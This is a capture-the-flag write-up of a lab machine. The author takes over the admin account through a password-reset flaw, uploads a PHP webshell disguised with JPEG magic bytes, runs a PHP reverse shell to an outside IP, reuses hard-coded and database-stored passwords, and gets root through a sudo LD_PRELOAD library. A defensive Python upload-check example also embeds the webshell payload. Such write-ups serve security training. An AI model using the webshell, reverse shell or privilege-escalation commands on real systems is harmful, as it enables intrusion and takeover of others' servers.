Target IP: 10.10.148.116
Challenge Description: As usual, obtain the user and root flag.
There are two TCP ports open on the target machine: SSH and HTTP, as shown above.
Aggressive port scan against the open TCP ports returns the result above. The HTTP application on port 80 looks interesting.
Port 80: HTTP
The webpage above is displayed for this web application.
I performed source-code scanning and found the login page at http://10.10.148.116/v2/admin/login.html, as shown above.
Browsing to http://10.10.148.116/v2/admin/login.html displays the login webpage above. I sprayed different default credentials, such as admin:admin and root:root, but I had no luck. However, I noticed it is possible to register an account on this web application.
I tried to create an account using the details above. After pressing the Register button, I got a successful confirmation!
I logged into the web application using the credentials I registered with. The webpage above is shown after logging in.
After some enumeration, I found the interesting information above. I tried to change the profile picture of the new user to see if I could upload a webshell, but I had no luck; however, the admin user has access to this feature! I even obtained the email address of the admin user, which is admin@sky.thm, as shown above.
Why does this web-application allow users to change their password directly? Maybe I can change the password of the user admin as I have their email address?
Using Burp Suite, I intercepted the POST request to change the password of the new user I created. I then changed the email field to admin@sky.thm, as shown above.
After forwarding this request, I got the message above. It looks like the password of user admin@sky.thm has been changed to test.
And bingo! I successfully logged in as the user admin as shown above. I should be able to change the profile picture now.
I created a simple PHP webshell called php.jpg.phtml. It contains the code aaaa<?php echo system($_GET['cmd']);?>. The four a characters at the beginning are placeholders that I overwrote with a hex editor to insert the magic bytes of a JPEG header: I replaced them with the bytes FFD8FFE0 at the start of the file.
After doing this, running file against the PHP webshell shows it is JPEG image data. This is done to bypass any filtering that is in place on the target system. And then I successfully uploaded this PHP webshell via the change profile picture feature. But where has my webshell been uploaded to?
As shown above, apparently the profile picture images are uploaded to /v2/profileimages/. I found this when viewing the source-code of the profile.php PHP file.
And bingo! Browsing to http://10.10.148.116/v2/profileimages/ states "Directory listing is disabled." But requesting the full file name and location gives me access to my webshell, as shown above. I can use the webshell to perform RCE. Time to upgrade this to a reverse shell connection.
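The bypass above works because the server only looks at the leading bytes of the upload and keeps the client's filename, so a file with a JPEG header and a .phtml extension is both accepted and executed. As an added example that is not part of the original writeup, the Python below contrasts that weak check with the one a defender would want: an allowlist applied to every extension in the name, a magic-byte sniff that must agree with the extension, and a server-generated filename. The sample upload is constructed from the writeup's description, and the constant names are assumptions.

```python
import os
import secrets

# Constructed sample input: the polyglot described in the writeup, a .phtml
# file whose first bytes are a JFIF header so that `file` reports JPEG data.
POLYGLOT_NAME = "php.jpg.phtml"
POLYGLOT_DATA = bytes.fromhex("FFD8FFE0") + b"<?php echo system($_GET['cmd']);?>"

# Image types a profile-picture endpoint has any reason to accept.
ALLOWED_EXT = {"jpg": "jpg", "jpeg": "jpg", "png": "png", "gif": "gif"}
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def sniff(data):
    """Return the image type implied by the leading bytes, or None."""
    return next((t for m, t in MAGIC.items() if data.startswith(m)), None)


def magic_only_check(name, data):
    """The weak check the writeup bypassed: it trusts the magic bytes alone
    and keeps the client's filename, so php.jpg.phtml is stored under the web
    root with an extension the PHP handler executes."""
    return sniff(data) is not None


def hardened_check(name, data, max_bytes=2 * 1024 * 1024):
    """Return a server-generated filename if the upload is acceptable, else
    None. Every extension in the client name must be on the allowlist (which
    rejects double extensions such as .jpg.phtml), the last extension must
    agree with the sniffed type, and the stored name is generated rather than
    taken from the client, so the client never controls the extension on disk."""
    if not data or len(data) > max_bytes:
        return None
    parts = os.path.basename(name).lower().split(".")
    if len(parts) < 2 or any(p not in ALLOWED_EXT for p in parts[1:]):
        return None
    kind = sniff(data)
    if kind is None or kind != ALLOWED_EXT[parts[-1]]:
        return None
    # Conservative extra: a profile picture has no reason to contain a PHP
    # open tag. Re-encoding the image with an image library is the stronger
    # fix, since it also strips payloads hidden in EXIF or trailing data.
    if b"<?" in data:
        return None
    return f"{secrets.token_hex(16)}.{kind}"
```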
Now I have a foothold on the target machine with the session as www-data. I started a listener on my machine at port 8443. Since the target machine is already using PHP, I deployed the URL-encoded PHP reverse shell script php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bexec%28%22bash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 via the webshell as shown above.
I noticed the credentials root:ThisIsSecurePassword! are hard-coded in some PHP files. Maybe I can access the MySQL application?
Using the credentials root:ThisIsSecurePassword!, I logged in to the MySQL application as the user root as shown above. There is an interesting database called SKY. However, I did not find anything useful here. I tried to spray this password against the user webdeveloper, but I had no luck.
Running the command ps -auxw shows the mongodb entry above. There is a MongoDB database running on the target machine.
Using the command mongo, I started the Mongo client. I ran the command show databases and it showed me four different databases. After enumerating for some time, I found backup to be the most interesting. This database contains a collection called user, which holds the password BahamasChapp123!@# of the user webdeveloper, who is also a user on this system.
And bingo! Using the password BahamasChapp123!@#, I successfully elevated my privileges from www-data to the user webdeveloper.
Running the command sudo -l shows the information above. The important part is env_keep+=LD_PRELOAD: sudo preserves the LD_PRELOAD environment variable, so I can load my own malicious library into the privileged process.
Over at /tmp, I created the malicious C library file with the name shell.c as shown above.
I compiled the code using the command gcc -fPIC -shared -o shell.so shell.c -nostartfiles, as shown above. And then using the command sudo LD_PRELOAD=/tmp/shell.so sky_backup_utility, I obtained a root shell. GG.
The user.txt flag is shown above.
The root.txt flag is shown above.